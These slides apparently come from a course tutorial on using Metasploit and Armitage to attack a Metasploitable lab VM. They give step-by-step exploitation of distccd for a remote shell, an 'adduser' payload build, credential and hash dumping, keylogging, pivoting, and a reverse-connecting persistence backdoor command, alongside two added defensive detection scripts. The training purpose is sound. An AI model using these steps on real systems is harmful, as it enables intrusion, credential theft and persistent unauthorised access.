Metasploit: a short tutorial. Thanks to Jos Wetzels & Wouter Bokslag
Slides: 68

STATUS OF THESE SLIDES
• Status: third version, improved and extended tutorial which includes use of VMware.
• Additional slides not included in the program for the moment.
• Additional slides need to be polished.
• BackTrack Linux has been replaced by Kali Linux (www.kali.org).
  - The slides have not been updated yet.
• Armitage
/ name of department 4-12-2020 PAGE 1

Let’s start - TBCHANGED
• Students are supposed to install Metasploit on their computer.
• The slides we make here are done using
  - Kali Linux and Armitage on the attacking side
    − http://www.kali.org/
  - Metasploitable on the attacked side.
    − Metasploitable is a Linux distribution full of bugged services, that can be used to practice Metasploit attacking skills.
    − See: http://www.offensive-security.com/metasploit-unleashed/Metasploitable
    − BTW: the last link is a beautiful site/tutorial on the use of Linux.
• We start with an exercise and then we get into the explanation.
• This exercise is *obligatory*.

Setup
• Warning: much more than running WebGoat, running Metasploitable makes you vulnerable also to external attacks.
• Be ready to be hacked.
• So, if you run it on your usual computer using VMware, use the network configuration “host only”.
  - This will make sure you cannot be hacked from outside.
• Setup I use for this small tutorial (and for most of what I do):
  - Mac + 2 virtual machines (one with Kali 2.0, the other one with Metasploitable)
• You can download

(OLD) Instructions for Windows
• Instructions for Windows are probably the following (they are old, and if they are not correct, find the solution yourself, ok? Real hackers are not stopped by silly details):
  - Download Metasploit; it should come with Armitage and Nmap built-in.
  - Download VMware Player (it’s free).
  - Download Metasploitable.
  - Open Metasploitable in VMware Player and run it.
  - Log in with msfadmin:msfadmin.
  - Get root using sudo su with password msfadmin.
  - Check if the network connection is up & running using ifconfig/ping, else use dhclient.
  - Note down the Metasploitable IP.
  - Start Armitage (Start -> All Programs -> Metasploit Framework -> ARMITAGE)
  - or: root@kali:~# armitage &

Instructions for Linux/VMware
• Install Kali and Metasploitable in two different virtual machines.
• Make sure they are connected with the “host only” system.
• Change the root password.
• Use the following command (regularly) to make sure you have the latest version installed:
  # apt-get update && apt-get upgrade
  - Meaning: “type apt-get update && apt-get upgrade”

Warning
• Some of these slides are written from the Windows perspective. Some others are written using BackTrack.
• Corrections to the slides are more than welcome.
• Again, you are expected to sort mismatches yourself.

Starting up BT with Kali
• # startx (check if needed)
  - do this only if the X Window System doesn’t start on its own.
• Open a terminal window
• # service postgresql start (check if needed)
  - may require:
  - # /etc/init.d/postgresql start
• # service metasploit start (on Kali 1)
• # msfdb (on Kali 2)
• # armitage
  - That will try to connect to the Metasploit RPC server: click “connect”
• If Metasploit is not running it will kindly ask you if it should start it for you. Click “yes” and be

Oops
• Depending on the network configuration you could get an error message.
• In this case….
• # ifconfig
  eth1  Link encap:Ethernet  HWaddr 00:0c:29:b8:b6:58
        inet addr:192.168.232.129  Bcast:192.168.232.255  Mask:255.0

Using ARMITAGE (the interface to Metasploit)
• The juicy interface
• Armitage = Metasploit ++
• Metasploit console

Hosts I’ve already “added” (we see in a minute how to do this)
• The console

To find out the “local” hosts
• With ifconfig you know what the IP address of your (virtual) machine is.
• You need to scan the network for the other ones.
  - To add the hosts (one of the many ways) you can use nmap directly from Armitage
  - Hosts > Nmap Scan > Quick Scan (OS Detect)
• You don’t want nmap to scan the whole network, so it is better if you have an idea which addresses you are looking for.

About Scanning
• You can initiate an Nmap scan through Hosts -> NMap Scan -> Intense Scan, All TCP Ports
  - But watch out: this is a very heavyweight scan. System administrators are going to see it happening. And they'll ask you questions.
• Initiate an auxiliary scan through Hosts -> MSF Scans
  - Wait until both scans complete (MSF Scan will notify you with a message box, the NMap scan tab will say so)
• See what ports are open and what services they are running by right-clicking the target -> Services

If the scanning went well….
• You get an inviting-looking message, and now the target computer(s) is on your radar.

Now you need to get in….
• You can use “login” if you have a legitimate login to the target system. (assume we don’t)
• Your goal is to find vulnerable services.
• You can go for a deeper scan.
• Right-click “scan”.
• And then ….

Gathering information
• You have discovered the operating system (see the penguin)
• Now right-click “services”

Finally
• > Attacks > Find Attacks ….

Finding the right attack
• Right click > Attack > ftp: you get to see 5 (in this case) exploits on (known vulnerabilities of) the ftp service that are known by Metasploit and that you *might* be able to use to attack the target.
• There is no guarantee that the target is actually vulnerable to any of them.
• So which one should you use?
• The hard way is to look at the features of the attacks one by one (more on how to do this later) and see if they match the target. The easy way is to use the “check” function. NB: not all exploits can be “checked”.
• Let’s try it…

Some tries….

So far, little luck
• If we check the ftp exploit, we get only two types of results:
• [*] This exploit does not support check
  - The target might be exploitable, but you don’t know, OR
• [*] The target is not exploitable
  - Meaning the target does not contain the vulnerability needed by the exploit. Perhaps it has been patched, or it uses software that does not match the exploit.
• So? We try other attacks.
• For instance:
  - Attack > misc > distcc_exec,
  - Exploiting service distccd

Bingo!
• So this is something we can and will use.
• To do so, we’d better first learn how to use the MSF console.
  - Which is the leftmost tab in the lower part of the screen

Exploitation, the graphical way…
• Find suitable attack suggestions (as opposed to manually identifying them)
  - Attacks -> Find Attacks
• When a message box notifies you that attacks have been found, an ‘Attack’ menu is added to the host right-click menu.
• Find vulnerable services by right-click
  - target -> Attack -> ‘Service name’ -> Check Exploits
  - This will open a tab which runs the ‘check’ method for each possible exploit. Press CTRL+F and search for “vulnerable”.
  - Some exploit modules do not support the `check` method; try these manually or check their descriptions. You can also search manually in the left-hand menu under ‘exploits’.

But old pros like you use the MSF Console
• It is the only supported way to access most of the features within Metasploit
• Provides a console-based interface to the framework
• Contains the most features and is the most stable MSF interface
• Full readline support, tabbing, and command completion
• Execution of external commands in msfconsole is possible

Some of the commands
While using MSFConsole other commands become available:
• `check` -> check if the target is vulnerable to the selected exploit (not always supported)
• `exploit` -> run the exploit with the set configuration
• `run` -> run the auxiliary module with the set configuration

Command-line Search
• We know that our target is attackable via the distcc_exec exploit
• We now want to build the attack from the console
• First we need to find the exploit (this *does* work in Kali)
• Type `search distcc`
• You might have to be patient waiting for the answer

Note
• Here you see as result exploit/unix/misc/distcc_exec,
• but on your release the directory may vary.
• Now you want to know more about this exploit.
• So you invoke: `info exploit/unix/misc/distcc_exec`

+ references (not included in screenshot)

Options
• As you can see there are two basic options:
  - RHOST -> Contains the target address
  - RPORT -> Contains the target port
  - TBD: check the automatic target
• The info also notifies you that the maximum payload space is 1024 bytes and targeting is done automatically (instead of having to select one depending on target host details)
  - We’ll get back to this payload thing in a second.
• Type `use exploit/unix/misc/distcc_exec` to use the exploit
  - You enter “exploitation mode”
• Type `help` to view the exploit commands

Exploit Commands
• So: what can we do with this exploit?
• In itself, it simply sets the first step in a (e.g.) buffer overflow.
• And what can we do as second step?
  - Meet the payload….

The carrier and the payload
• distcc_exec is basically a “carrier”, that can probably carry many different kinds of payloads. Our goal is to get full control of the target machine, so let’s see if we can do this using this carrier.

Let’s choose a Payload
• We know we have 1024 bytes of payload space (which is enough for a lot of purposes). Let’s see what you can do with it, type
  - show targets (here not needed because it is an “automatic target” exploit)
  - show payloads (next slide)

Show Payloads
• A shell is what you want to get.
• Bind TCP: a shell on the target machine, which listens on a given port.
• Reverse TCP: a shell on the target machine, which connects back to the attacking one (bye firewall… no problem with NAT translations etc.)
• Two years ago there were half as many payloads….
• Type `info cmd/unix/bind_perl` to display information about this payload

Info on bind_perl

Set payload; show options
• Options of the exploit
• Options of the specific payload

Going on….
• Type `set RHOST 192.168.232.128` to select our target
• Since our RPORT is already set correctly and RHOST isn’t necessary for the payload we won’t set those
• Our bindshell will listen on port 12467 (??, in other images) if it is executed successfully; keep in mind this port has to be free and preferably above 1024 (since most services don’t run as root – and only root can listen on ports below 1024)
• For some exploits, we can type `check` to see if the target is vulnerable; we won’t do it for this one though
• Type `show evasion` to show evasion methods (we will not select any)
• Now type `exploit` to exploit our target

Alternative way to set LPORT, etc…
• Set LHOST to the IP of the attacking machine (if you’re not using a pivot, this is your own IP)
• Let LPORT be whatever it is
• Set RHOST to be the IP of the target machine
• Set RPORT to be the port of the vulnerable service (in this case 3632 of distccd)
• Click Launch

BINGO!!!
• Notice how Armitage tells you that the target has been compromised. Now we can do basically anything on it.

Graphical Notation

Did you succeed?
• If you are successful, the target machine icon will be red with electric jolts and the console tab will notify you that you have a shell. A menu option for the shell will be added to the right-click menu of the target.
• NOTE: For Unix targets a shell is the default payload, for Windows targets a meterpreter session is the default payload. These can be modified by working from the console tab and using MSFConsole instead of the GUI. Results are added to the GUI though.
• Interact with Shell 1; you have now compromised the target machine.

Meterpreter? (1)
• Typically, you want to have a shell on the target system
  - So the payload executes a command interpreter
  - Like /bin/sh
• This approach, however, has disadvantages: (think about it a sec)
  - Easily detectable:
    − The execution of a program involves the creation of a process, which can be detected by a host-based intrusion detection system (whitelisting)
  - Chroot problem.
    − If the application you exploit is chrooted, then it is impossible for it (and thus for your payload) to refer to objects outside the chrooted environment. So you can't call /bin/sh at all (there appear to be ways out of this, but if you are at that level you should not sit in this class)
  - Limitation of the command interpreter
    − which may have access to a limited set of commands
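As an added example (not from the slides), here is the host-side check behind the “easily detectable” point above: walk a `ps` process tree and flag any shell descended from a network daemon, which is exactly what a shell payload delivered through distccd looks like. The ps output and the daemon allowlist are constructed for illustration.

```python
"""Flag shells spawned by network-facing daemons in `ps` output.

Added example, not part of the tutorial. A plain shell payload creates a
new process under the exploited service; a process-tree walk makes that
parent/child relationship visible. Sample data below is constructed.
"""

# Constructed `ps -eo pid,ppid,user,comm` output for a Metasploitable-like host.
SAMPLE_PS = """\
  PID  PPID USER     COMMAND
    1     0 root     init
  812     1 root     sshd
 1044     1 daemon   distccd
 2201  1044 daemon   distccd
 2231  2201 daemon   sh
 2240  2231 daemon   perl
 2301   812 root     sshd
 2310  2301 alice    bash
"""

# Hypothetical allowlist of daemons that accept network connections on this host.
NETWORK_DAEMONS = {"distccd", "sshd", "vsftpd", "apache2", "smbd"}
SHELLS = {"sh", "bash", "dash", "zsh"}
# sshd legitimately spawns shells for logged-in users, so it is excluded by default.
DAEMONS_ALLOWED_TO_SPAWN_SHELLS = {"sshd"}


def parse_ps(text):
    """Return {pid: (ppid, user, comm)} from the ps table (header row skipped)."""
    procs = {}
    for line in text.splitlines()[1:]:
        fields = line.split(None, 3)
        if len(fields) < 4:
            continue
        pid, ppid, user, comm = int(fields[0]), int(fields[1]), fields[2], fields[3].strip()
        procs[pid] = (ppid, user, comm)
    return procs


def ancestors(procs, pid):
    """Yield (pid, comm) for each ancestor of pid, nearest first, guarding against cycles."""
    seen = set()
    ppid = procs[pid][0]
    while ppid in procs and ppid not in seen:
        seen.add(ppid)
        yield ppid, procs[ppid][2]
        ppid = procs[ppid][0]


def shells_from_services(procs):
    """Return (shell_pid, shell_comm, daemon_pid, daemon_comm) for every shell
    whose nearest network-daemon ancestor is not allowed to spawn shells."""
    findings = []
    for pid, (_, user, comm) in sorted(procs.items()):
        if comm not in SHELLS:
            continue
        for apid, acomm in ancestors(procs, pid):
            if acomm in NETWORK_DAEMONS:
                if acomm not in DAEMONS_ALLOWED_TO_SPAWN_SHELLS:
                    findings.append((pid, comm, apid, acomm))
                break  # the nearest daemon ancestor decides; stop walking up
    return findings


if __name__ == "__main__":
    for shell_pid, shell, daemon_pid, daemon in shells_from_services(parse_ps(SAMPLE_PS)):
        print(f"{shell} (pid {shell_pid}) was spawned under {daemon} (pid {daemon_pid})")
```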

Meterpreter! (2)
• The meterpreter is a meta-interpreter that runs within the exploited application.
• Evades the problems we mentioned so far
  - NOT easily detectable.
    − The meterpreter does not need to start a new process. Also, the meterpreter extensions, and the meterpreter server itself, are all executed entirely from memory (technique called Remote Library Injection)
    − In some cases the injected application keeps on running.
  - DOES NOT HAVE a chroot problem.
    − It executes all commands within the exploited application, so it doesn't have to access other resources (which would be difficult in the case of a chrooted application)
  - DOES NOT SUFFER limitations of the command interpreter,
    − actually you can write your own command extensions as long as they can be compiled into a DLL.

For instance
• We can start a shell
• Notice the extra menu item “Shell 1” that has appeared when you right-click.
• Click “interact”, and what you get is

A shell on the target machine
• It appears as a new tab in the bottom window.

You upload some files
• Use:
• Try it on a custom file
• Then go to your console, type “ls” and notice that the file has been uploaded.
• It could be an executable, of course.

You can pass the session to yourself or someone else.
• Once you exploit a host, duplicating your access should be a first priority. Meterpreter N -> Access > Pass Session will inject meterpreter into memory and execute it for you. By default this option is configured to call back to Armitage's default Meterpreter listener. Just click Launch.
• You may also use Pass Session to send meterpreter to a friend. Set LPORT and LHOST to the values of their Meterpreter multi/handler.
• If your friend uses Armitage, have them type set in a Console tab and report the LHOST and LPORT values to you. These are the values for their default Meterpreter listener.
• So if you launch on Pass Session, you’ll get a second shell
Source: http://www.fastandeasyhacking.com/manual

Post-exploitation modules
• Now you are in, you have control of the target, but you want to carry out specific tasks, like keylogging.
• You can use one of the many ready post-exploitation modules.
• Exercise: try some of these post-exploitation modules.

For instance
• Post-module firefox_creds…

Payload Usage in Armitage
• Armitage has static payloads
  - (Shell for Unix target, Meterpreter for Windows target)
  - but supports MSFConsole in a tab.
• Great use of payloads in Armitage: generating payload executables
• Let’s generate a payload ELF.

Take a look at “adduser” (1/3)
• Either use the left-hand menu, or

Take a look at “adduser” (2/3)
• but old pros like you use the MSFConsole.
  - > use payload/linux/x86/adduser
    − (note: requires root shell!)
  - > set USER metasploit
  - > set PASS metasploit
  - > generate -t elf -f C:\dir\naughtyelf (don’t use double-quotes)

Take a look at “adduser” (3/3)
• And now you can upload it….
• Right-click target -> Shell 1 -> Upload -> Select naughtyelf
• Right-click target -> Shell 1 -> Interact
  - $ chmod +x ./naughtyelf
  - $ cat /etc/passwd (and verify a new user named metasploit is added)

LET’S RECAPITULATE

Metasploit: a framework for penetration testing and exploitation
• Metasploit is an open source

Metasploit Architecture
• TOOLS
• PLUGINS
• LIBRARY
• MODULES
  - Exploits
  - Payloads
  - Encoders
  - Nops
  - Auxiliary

Exploits
• For a single vulnerability for a set of targets
• Active exploits (attack a specific host)
• Passive exploits: wait for a connection and try to exploit the connecting application (e.g. the web browser)

Payloads
• Generate stand-alone shellcode or can be selected for use in exploits
• Three types
  - Inline/Single.
    − Standalone, self-contained shellcode (e.g. adding a user to a system)
  - Stager.
    − Sets up the network connection between victim and attacker (e.g. bindshells, reverse connect shell, etc.)
  - Stages.
    − Payload components downloaded by the Stager module, provide advanced features with no size limit (e.g. Meterpreter, VNC injection, etc.)

Encoders
• Encoders encode a payload and prefix a decoder to evade detection
  - Must not touch certain registers
  - Must be under a max size
  - Must avoid bad characters (NULL bytes, newlines, etc.)
  - We'll get back to this when we describe how to write your own module.
• Can generate alphanumeric shellcode
  − (ASCII-printable shellcode)

And now: Armitage

ADDITIONAL SLIDES TO BE INCLUDED (ONE DAY)

Meterpreter in Armitage
• Assume we have exploited a Windows machine and have a running Meterpreter session.
• This can be achieved without exploitation through the left-hand menu -> Payloads -> Windows -> Meterpreter -> bind_tcp and generating an EXE file containing the meterpreter payload.
• After running it on the target machine, go to ARMITAGE -> Listeners -> Bind and connect to the port of the Meterpreter session to compromise the target machine
• Can be used to browse files, list processes, run a VNC session, make screenshots, etc.


System Access & Escalation
• Meterpreter -> Access -> Escalate Privileges to get the highest possible privileges (potentially SYSTEM)
• Meterpreter -> Access -> Dump Hashes to dump system hashes; View -> Credentials to view them. These can be used in a `Pass the hash` attack or cracked using Cain or John The Ripper
• Meterpreter -> Access -> Migrate Now migrates the Meterpreter session to a new process
• Meterpreter -> Explore -> Key Scan initiates a keylogger on the target machine, logging all pressed keys.

ARP Scan
− Meterpreter -> ARP Scan
− ARP scanning finds hosts on the same network as the compromised host
− Pick the subnet you’re interested in and click ARP Scan; this adds hosts in the same subnet to your Armitage target list

Pivoting
− Pivoting is routing your Metasploit attacks through a compromised host
− In order to set up pivoting, right-click the target -> Meterpreter -> Pivot -> Setup
− Select the subnet you want to pivot through the session
− Once set up, green lines will be drawn between the host and all reachable targets
− The line will become bright green when the pivot is in use
− To use a pivot host for a reverse connection, set the LHOST variable in the exploit launch dialog to the IP address of the pivot host.


Maintaining access using persistence
• Meterpreter console -> run persistence -U -i 5 -p 1337 -r 10.0.0.11
• Interacting with the backdoor is done by ARMITAGE -> Listeners -> Reverse (wait for) with the correct port number. When the target machine boots, a meterpreter connection will be spawned.

Other way to maintain access
• Creating a persistent meterpreter backdoor service (METSVC) allows us to maintain access
• right-click target -> Meterpreter -> Access -> Persist
• Interacting with the backdoor is done by ARMITAGE -> Listeners -> Reverse (wait for) with the correct port number. When the target machine boots, a meterpreter connection will be spawned.

Handy Commands
• ifconfig: to see which interfaces are open
• lsof (list of open files, typically: lsof -i -P) to see which programs are listening on which ports (in Unix, sockets are files).
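As an added example (not from the slides), a small Python triage of `lsof -i -P` output that covers the two payload shapes from the Show Payloads slide: a bind shell shows up as an interpreter LISTENing on an unexpected high port (12467 in the tutorial), a reverse shell as a shell whose stdin/stdout is a TCP socket. The lsof output and the listener baseline are constructed for illustration.

```python
"""Triage `lsof -i -P` output for bind-shell and reverse-shell indicators.

Added example, not part of the tutorial. Sample output and the baseline of
expected listeners are constructed, not captured from Metasploitable.
"""
from dataclasses import dataclass

# Constructed `lsof -i -P` output from a Metasploitable-like host.
SAMPLE_LSOF = """\
COMMAND   PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
sshd      812   root    3u  IPv4  12345      0t0  TCP *:22 (LISTEN)
distccd  1044 daemon    4u  IPv4  12401      0t0  TCP *:3632 (LISTEN)
distccd  1044 daemon    5u  IPv4  19870      0t0  TCP 192.168.232.128:3632->192.168.232.129:40011 (ESTABLISHED)
perl     2240 daemon    3u  IPv4  19876      0t0  TCP *:12467 (LISTEN)
sh       2231 daemon    0u  IPv4  19880      0t0  TCP 192.168.232.128:45120->192.168.232.129:4444 (ESTABLISHED)
sh       2231 daemon    1u  IPv4  19880      0t0  TCP 192.168.232.128:45120->192.168.232.129:4444 (ESTABLISHED)
"""

# Hypothetical baseline of (command, port) pairs expected to listen on this host.
BASELINE_LISTENERS = {("sshd", 22), ("distccd", 3632)}

# Interpreters and shells that Metasploit command payloads typically run (bind_perl, /bin/sh).
SHELL_LIKE = {"sh", "bash", "dash", "perl", "python", "ruby", "nc", "ncat"}


@dataclass(frozen=True)
class Socket:
    command: str
    pid: int
    user: str
    fd: str
    proto: str
    name: str
    state: str  # "LISTEN", "ESTABLISHED", or "" when lsof prints no state (UDP)


def parse_lsof(text):
    """Parse the whitespace-separated lsof -i table into Socket records."""
    sockets = []
    for line in text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        # The NODE column (TCP/UDP) anchors the layout because SIZE/OFF may be blank.
        node_idx = next((i for i, f in enumerate(fields) if f in ("TCP", "UDP")), None)
        if node_idx is None or len(fields) < node_idx + 2:
            continue
        state = fields[node_idx + 2].strip("()") if len(fields) > node_idx + 2 else ""
        sockets.append(Socket(fields[0], int(fields[1]), fields[2], fields[3],
                              fields[node_idx], fields[node_idx + 1], state))
    return sockets


def local_port(name):
    """'*:12467' -> 12467; '10.0.0.5:45120->10.0.0.9:4444' -> 45120."""
    local = name.split("->")[0]
    return int(local.rsplit(":", 1)[1])


def triage(sockets, baseline=BASELINE_LISTENERS):
    """Return (kind, command, pid, detail) findings for suspicious sockets."""
    findings = []
    seen = set()
    for s in sockets:
        if s.state == "LISTEN":
            port = local_port(s.name)
            if (s.command, port) not in baseline:
                kind = "bind-shell-like listener" if s.command in SHELL_LIKE else "unexpected listener"
                findings.append((kind, s.command, s.pid, f"{s.user} listening on {port}"))
        elif s.state == "ESTABLISHED" and s.fd in ("0u", "1u", "2u") and s.command in SHELL_LIKE:
            # A shell whose stdin/stdout/stderr is a TCP socket: the reverse-shell shape.
            key = (s.pid, s.name)
            if key not in seen:  # report each connected shell once, not per fd
                seen.add(key)
                findings.append(("shell with socket as stdio", s.command, s.pid, s.name))
    return findings


if __name__ == "__main__":
    for finding in triage(parse_lsof(SAMPLE_LSOF)):
        print(*finding)
```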